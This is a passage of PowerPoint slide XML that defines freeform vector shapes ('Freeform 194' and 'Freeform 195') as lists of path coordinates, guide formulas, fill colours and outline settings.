                      <a:pt x="20" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="188"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36462" name="Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2742" y="2561"/>
                <a:ext cx="250" cy="196"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 250"/>
                  <a:gd name="T1" fmla="*/ 181 h 196"/>
                  <a:gd name="T2" fmla="*/ 23 w 250"/>
                  <a:gd name="T3" fmla="*/ 181 h 196"/>
                  <a:gd name="T4" fmla="*/ 13 w 250"/>
                  <a:gd name="T5" fmla="*/ 175 h 196"/>
                  <a:gd name="T6" fmla="*/ 14 w 250"/>
                  <a:gd name="T7" fmla="*/ 170 h 196"/>
                  <a:gd name="T8" fmla="*/ 13 w 250"/>
                  <a:gd name="T9" fmla="*/ 166 h 196"/>
                  <a:gd name="T10" fmla="*/ 7 w 250"/>
                  <a:gd name="T11" fmla="*/ 161 h 196"/>
                  <a:gd name="T12" fmla="*/ 0 w 250"/>
                  <a:gd name="T13" fmla="*/ 151 h 196"/>
                  <a:gd name="T14" fmla="*/ 2 w 250"/>
                  <a:gd name="T15" fmla="*/ 143 h 196"/>
                  <a:gd name="T16" fmla="*/ 11 w 250"/>
                  <a:gd name="T17" fmla="*/ 144 h 196"/>
                  <a:gd name="T18" fmla="*/ 19 w 250"/>
                  <a:gd name="T19" fmla="*/ 139 h 196"/>
                  <a:gd name="T20" fmla="*/ 33 w 250"/>
                  <a:gd name="T21" fmla="*/ 137 h 196"/>
                  <a:gd name="T22" fmla="*/ 53 w 250"/>
                  <a:gd name="T23" fmla="*/ 136 h 196"/>
                  <a:gd name="T24" fmla="*/ 60 w 250"/>
                  <a:gd name="T25" fmla="*/ 128 h 196"/>
                  <a:gd name="T26" fmla="*/ 64 w 250"/>
                  <a:gd name="T27" fmla="*/ 112 h 196"/>
                  <a:gd name="T28" fmla="*/ 64 w 250"/>
                  <a:gd name="T29" fmla="*/ 98 h 196"/>
                  <a:gd name="T30" fmla="*/ 64 w 250"/>
                  <a:gd name="T31" fmla="*/ 74 h 196"/>
                  <a:gd name="T32" fmla="*/ 89 w 250"/>
                  <a:gd name="T33" fmla="*/ 69 h 196"/>
                  <a:gd name="T34" fmla="*/ 117 w 250"/>
                  <a:gd name="T35" fmla="*/ 44 h 196"/>
                  <a:gd name="T36" fmla="*/ 144 w 250"/>
                  <a:gd name="T37" fmla="*/ 25 h 196"/>
                  <a:gd name="T38" fmla="*/ 185 w 250"/>
                  <a:gd name="T39" fmla="*/ 1 h 196"/>
                  <a:gd name="T40" fmla="*/ 193 w 250"/>
                  <a:gd name="T41" fmla="*/ 1 h 196"/>
                  <a:gd name="T42" fmla="*/ 212 w 250"/>
                  <a:gd name="T43" fmla="*/ 7 h 196"/>
                  <a:gd name="T44" fmla="*/ 222 w 250"/>
                  <a:gd name="T45" fmla="*/ 16 h 196"/>
                  <a:gd name="T46" fmla="*/ 235 w 250"/>
                  <a:gd name="T47" fmla="*/ 9 h 196"/>
                  <a:gd name="T48" fmla="*/ 238 w 250"/>
                  <a:gd name="T49" fmla="*/ 35 h 196"/>
                  <a:gd name="T50" fmla="*/ 245 w 250"/>
                  <a:gd name="T51" fmla="*/ 49 h 196"/>
                  <a:gd name="T52" fmla="*/ 248 w 250"/>
                  <a:gd name="T53" fmla="*/ 59 h 196"/>
                  <a:gd name="T54" fmla="*/ 244 w 250"/>
                  <a:gd name="T55" fmla="*/ 75 h 196"/>
                  <a:gd name="T56" fmla="*/ 244 w 250"/>
                  <a:gd name="T57" fmla="*/ 86 h 196"/>
                  <a:gd name="T58" fmla="*/ 243 w 250"/>
                  <a:gd name="T59" fmla="*/ 100 h 196"/>
                  <a:gd name="T60" fmla="*/ 243 w 250"/>
                  <a:gd name="T61" fmla="*/ 111 h 196"/>
                  <a:gd name="T62" fmla="*/ 221 w 250"/>
                  <a:gd name="T63" fmla="*/ 136 h 196"/>
                  <a:gd name="T64" fmla="*/ 211 w 250"/>
                  <a:gd name="T65" fmla="*/ 152 h 196"/>
                  <a:gd name="T66" fmla="*/ 212 w 250"/>
                  <a:gd name="T67" fmla="*/ 162 h 196"/>
                  <a:gd name="T68" fmla="*/ 205 w 250"/>
                  <a:gd name="T69" fmla="*/ 165 h 196"/>
                  <a:gd name="T70" fmla="*/ 199 w 250"/>
                  <a:gd name="T71" fmla="*/ 168 h 196"/>
                  <a:gd name="T72" fmla="*/ 192 w 250"/>
                  <a:gd name="T73" fmla="*/ 174 h 196"/>
                  <a:gd name="T74" fmla="*/ 182 w 250"/>
                  <a:gd name="T75" fmla="*/ 171 h 196"/>
                  <a:gd name="T76" fmla="*/ 172 w 250"/>
                  <a:gd name="T77" fmla="*/ 169 h 196"/>
                  <a:gd name="T78" fmla="*/ 162 w 250"/>
                  <a:gd name="T79" fmla="*/ 170 h 196"/>
                  <a:gd name="T80" fmla="*/ 154 w 250"/>
                  <a:gd name="T81" fmla="*/ 174 h 196"/>
                  <a:gd name="T82" fmla="*/ 147 w 250"/>
                  <a:gd name="T83" fmla="*/ 178 h 196"/>
                  <a:gd name="T84" fmla="*/ 134 w 250"/>
                  <a:gd name="T85" fmla="*/ 176 h 196"/>
                  <a:gd name="T86" fmla="*/ 123 w 250"/>
                  <a:gd name="T87" fmla="*/ 170 h 196"/>
                  <a:gd name="T88" fmla="*/ 110 w 250"/>
                  <a:gd name="T89" fmla="*/ 175 h 196"/>
                  <a:gd name="T90" fmla="*/ 106 w 250"/>
                  <a:gd name="T91" fmla="*/ 174 h 196"/>
                  <a:gd name="T92" fmla="*/ 92 w 250"/>
                  <a:gd name="T93" fmla="*/ 163 h 196"/>
                  <a:gd name="T94" fmla="*/ 76 w 250"/>
                  <a:gd name="T95" fmla="*/ 163 h 196"/>
                  <a:gd name="T96" fmla="*/ 64 w 250"/>
                  <a:gd name="T97" fmla="*/ 167 h 196"/>
                  <a:gd name="T98" fmla="*/ 56 w 250"/>
                  <a:gd name="T99" fmla="*/ 182 h 196"/>
                  <a:gd name="T100" fmla="*/ 54 w 250"/>
                  <a:gd name="T101" fmla="*/ 196 h 196"/>
                  <a:gd name="T102" fmla="*/ 43 w 250"/>
                  <a:gd name="T103" fmla="*/ 188 h 196"/>
                  <a:gd name="T104" fmla="*/ 38 w 250"/>
                  <a:gd name="T105" fmla="*/ 186 h 19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250"/>
                  <a:gd name="T160" fmla="*/ 0 h 196"/>
                  <a:gd name="T161" fmla="*/ 250 w 250"/>
                  <a:gd name="T162" fmla="*/ 196 h 19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250" h="196">
                    <a:moveTo>
                      <a:pt x="34" y="188"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="30" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="188"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36463" name="Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3093" y="2160"/>
                <a:ext cx="98" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 98"/>
                  <a:gd name="T1" fmla="*/ 40 h 67"/>
                  <a:gd name="T2" fmla="*/ 2 w 98"/>
                  <a:gd name="T3" fmla="*/ 32 h 67"/>
                  <a:gd name="T4" fmla="*/ 10 w 98"/>
                  <a:gd name="T5" fmla="*/ 26 h 67"/>
                  <a:gd name="T6" fmla="*/ 0 w 98"/>
                  <a:gd name="T7" fmla="*/ 13 h 67"/>
                  <a:gd name="T8" fmla="*/ 1 w 98"/>
                  <a:gd name="T9" fmla="*/ 7 h 67"/>
                  <a:gd name="T10" fmla="*/ 6 w 98"/>
                  <a:gd name="T11" fmla="*/ 0 h 67"/>
                  <a:gd name="T12" fmla="*/ 12 w 98"/>
                  <a:gd name="T13" fmla="*/ 3 h 67"/>
                  <a:gd name="T14" fmla="*/ 10 w 98"/>
                  <a:gd name="T15" fmla="*/ 8 h 67"/>
                  <a:gd name="T16" fmla="*/ 18 w 98"/>
                  <a:gd name="T17" fmla="*/ 6 h 67"/>
                  <a:gd name="T18" fmla="*/ 29 w 98"/>
                  <a:gd name="T19" fmla="*/ 10 h 67"/>
                  <a:gd name="T20" fmla="*/ 37 w 98"/>
                  <a:gd name="T21" fmla="*/ 7 h 67"/>
                  <a:gd name="T22" fmla="*/ 49 w 98"/>
                  <a:gd name="T23" fmla="*/ 11 h 67"/>
                  <a:gd name="T24" fmla="*/ 65 w 98"/>
                  <a:gd name="T25" fmla="*/ 3 h 67"/>
                  <a:gd name="T26" fmla="*/ 73 w 98"/>
                  <a:gd name="T27" fmla="*/ 1 h 67"/>
                  <a:gd name="T28" fmla="*/ 80 w 98"/>
                  <a:gd name="T29" fmla="*/ 5 h 67"/>
                  <a:gd name="T30" fmla="*/ 94 w 98"/>
                  <a:gd name="T31" fmla="*/ 10 h 67"/>
                  <a:gd name="T32" fmla="*/ 98 w 98"/>
                  <a:gd name="T33" fmla="*/ 15 h 67"/>
                  <a:gd name="T34" fmla="*/ 95 w 98"/>
                  <a:gd name="T35" fmla="*/ 18 h 67"/>
                  <a:gd name="T36" fmla="*/ 91 w 98"/>
                  <a:gd name="T37" fmla="*/ 19 h 67"/>
                  <a:gd name="T38" fmla="*/ 88 w 98"/>
                  <a:gd name="T39" fmla="*/ 32 h 67"/>
                  <a:gd name="T40" fmla="*/ 85 w 98"/>
                  <a:gd name="T41" fmla="*/ 35 h 67"/>
                  <a:gd name="T42" fmla="*/ 82 w 98"/>
                  <a:gd name="T43" fmla="*/ 41 h 67"/>
                  <a:gd name="T44" fmla="*/ 86 w 98"/>
                  <a:gd name="T45" fmla="*/ 43 h 67"/>
                  <a:gd name="T46" fmla="*/ 89 w 98"/>
                  <a:gd name="T47" fmla="*/ 48 h 67"/>
                  <a:gd name="T48" fmla="*/ 79 w 98"/>
                  <a:gd name="T49" fmla="*/ 50 h 67"/>
                  <a:gd name="T50" fmla="*/ 72 w 98"/>
                  <a:gd name="T51" fmla="*/ 49 h 67"/>
                  <a:gd name="T52" fmla="*/ 64 w 98"/>
                  <a:gd name="T53" fmla="*/ 57 h 67"/>
                  <a:gd name="T54" fmla="*/ 59 w 98"/>
                  <a:gd name="T55" fmla="*/ 59 h 67"/>
                  <a:gd name="T56" fmla="*/ 59 w 98"/>
                  <a:gd name="T57" fmla="*/ 64 h 67"/>
                  <a:gd name="T58" fmla="*/ 48 w 98"/>
                  <a:gd name="T59" fmla="*/ 67 h 67"/>
                  <a:gd name="T60" fmla="*/ 34 w 98"/>
                  <a:gd name="T61" fmla="*/ 60 h 67"/>
                  <a:gd name="T62" fmla="*/ 24 w 98"/>
                  <a:gd name="T63" fmla="*/ 63 h 67"/>
                  <a:gd name="T64" fmla="*/ 10 w 98"/>
                  <a:gd name="T65" fmla="*/ 66 h 67"/>
                  <a:gd name="T66" fmla="*/ 10 w 98"/>
                  <a:gd name="T67" fmla="*/ 61 h 67"/>
                  <a:gd name="T68" fmla="*/ 9 w 98"/>
                  <a:gd name="T69" fmla="*/ 52 h 67"/>
                  <a:gd name="T70" fmla="*/ 1 w 98"/>
                  <a:gd name="T71" fmla="*/ 45 h 67"/>
                  <a:gd name="T72" fmla="*/ 0 w 98"/>
                  <a:gd name="T73" fmla="*/ 42 h 67"/>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98"/>
                  <a:gd name="T112" fmla="*/ 0 h 67"/>
                  <a:gd name="T113" fmla="*/ 98 w 98"/>
                  <a:gd name="T114" fmla="*/ 67 h 67"/>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98" h="67">
                    <a:moveTo>
                      <a:pt x="0" y="42"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="11"/>
